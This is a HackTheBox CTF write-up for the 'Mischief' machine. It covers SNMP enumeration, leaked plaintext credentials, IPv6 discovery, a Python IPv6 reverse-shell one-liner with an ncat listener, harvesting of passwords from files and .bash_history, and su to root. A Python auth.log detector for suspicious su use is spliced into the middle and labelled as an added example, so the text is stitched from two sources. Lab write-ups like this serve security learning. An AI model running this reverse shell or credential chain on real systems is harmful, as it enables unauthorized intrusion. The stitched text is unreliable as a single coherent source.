Machine Profile

This is one of my favorite machines, and it's my first CTF & HackTheBox write-up. If you read this, please give me feedback on how the write-up was, and give me some suggestions. It will help me write better write-ups. Let's start the write-up.

First things first: we run an NMAP scan. :D

We found two open ports. If we browse this URL we get a login page that requires authentication.

URL: http://10.10.10.92:3366/

Now we run another NMAP scan for UDP ports.

We found an open port with an SNMP service running.

If we run this command we get the login credentials.

Command: snmpwalk -c public -v 2c 10.10.10.92

We got the login credentials.

Username: loki Password: godofmischiefisloki

Let's go back to the URL & log in with these credentials.

After logging in with the above credentials, we get another credential. That means we have to find another place to log in with this new credential.

I always search every machine maker's username on Google for a clue. :3

And I found that the same user developed an SNMP IPv6 enumeration tool named Enyx. Interesting, nah?

Enyx: https://github.com/trickster0/Enyx

Let’s enumerate with Enyx.

Command: python enyx.py 2c public 10.10.10.92

We found the IPv6 address :)

Now let's enumerate the IPv6 address with NMAP.

After running the NMAP scan we can see that ports 22 & 80 are open.

Let's browse to the IPv6 address.

Now we have found another login page.

Let's try to log in to this page with the credential we found before.

Username: loki Password: trickeryanddeceit

We can't log in here with this credential. Let's use our common sense here.

Change the username from loki to administrator.

We can successfully log in with this credential:

Username: administrator Password: trickeryanddeceit

Let's try for a reverse shell.

NCAT Listener: ncat -6 -lvnp 4444

Reverse shell: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("your-machines-ipv6-address",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Let's upgrade our shell to a proper TTY with this Python one-liner.

Script: python -c 'import pty; pty.spawn("/bin/bash");'

We got the reverse shell, but cannot open the user.txt file. Well, no problem. We got another credential from /home/loki/credentials.

Let's open another terminal & log in as loki via SSH.

Username: loki Password: lokiisthebestnorsegod

We got the user hash; now it's time to get the root hash.

And we found the root password in .bash_history.

Let's go back to the www-data@Mischief terminal, because only www-data has the rights to execute the su command.

Let's run su & use this password: lokipasswordmischieftrickery
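Since only www-data can run su on this box, an su from www-data to root is exactly the event a defender would want to catch. As an added example (not from the original write-up), here is a small Python check over constructed auth.log lines in the standard su / pam_unix format; it flags su sessions opened by service accounts and failed su attempts to root, and the service-account list is an assumption:

```python
import re
from typing import Dict, List

# Constructed sample auth.log lines (not captured from the machine).
SAMPLE_AUTH_LOG = """\
Mar 10 12:00:01 Mischief sshd[1001]: Accepted password for loki from 10.10.14.5 port 51234 ssh2
Mar 10 12:00:01 Mischief sshd[1001]: pam_unix(sshd:session): session opened for user loki by (uid=0)
Mar 10 12:03:17 Mischief su[1210]: Successful su for root by www-data
Mar 10 12:03:17 Mischief su[1210]: + /dev/pts/1 www-data:root
Mar 10 12:03:17 Mischief su[1210]: pam_unix(su:session): session opened for user root by www-data(uid=33)
Mar 10 12:05:40 Mischief su[1300]: FAILED SU (to root) loki on /dev/pts/2
Mar 10 12:06:02 Mischief sudo[1350]: pam_unix(sudo:session): session opened for user root by loki(uid=1000)
"""

# Assumed list of accounts that should never switch user interactively.
SERVICE_ACCOUNTS = {"www-data", "nobody", "daemon", "mysql", "postgres"}

# pam_unix line written when an su session is opened successfully.
SU_OPENED = re.compile(
    r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) su\[(?P<pid>\d+)\]: "
    r"pam_unix\(su:session\): session opened for user (?P<target>\S+) "
    r"by (?P<actor>[^(\s]+)\(uid=(?P<uid>\d+)\)"
)
# shadow-utils line written for a failed su attempt.
SU_FAILED = re.compile(r"su\[(?P<pid>\d+)\]: FAILED SU \(to (?P<target>\S+)\) (?P<actor>\S+) on")


def detect_su_abuse(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per su session opened by a service account
    and per failed su attempt to root, in log order."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = SU_OPENED.search(line)
        if m and m.group("actor") in SERVICE_ACCOUNTS:
            findings.append({"kind": "service_account_su", "actor": m.group("actor"),
                             "target": m.group("target"), "pid": m.group("pid")})
            continue
        f = SU_FAILED.search(line)
        if f and f.group("target") == "root":
            findings.append({"kind": "failed_su_root", "actor": f.group("actor"),
                             "target": "root", "pid": f.group("pid")})
    return findings


if __name__ == "__main__":
    for finding in detect_su_abuse(SAMPLE_AUTH_LOG):
        print(finding)
```

A real deployment would stream /var/log/auth.log (or the journal) rather than a string, but the two patterns are the same ones syslog records.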

Yay, we are root now.

Wait, what!

Well, we are hackers. We know how to find it.

Let's run the find command to locate root.txt.

Yay, finally we found root.txt.

We did it!

Contact Me:

Twitter: https://twitter.com/TheShahzada

Github: https://github.com/theshahzada

HackTheBox: https://www.hackthebox.eu/profile/37502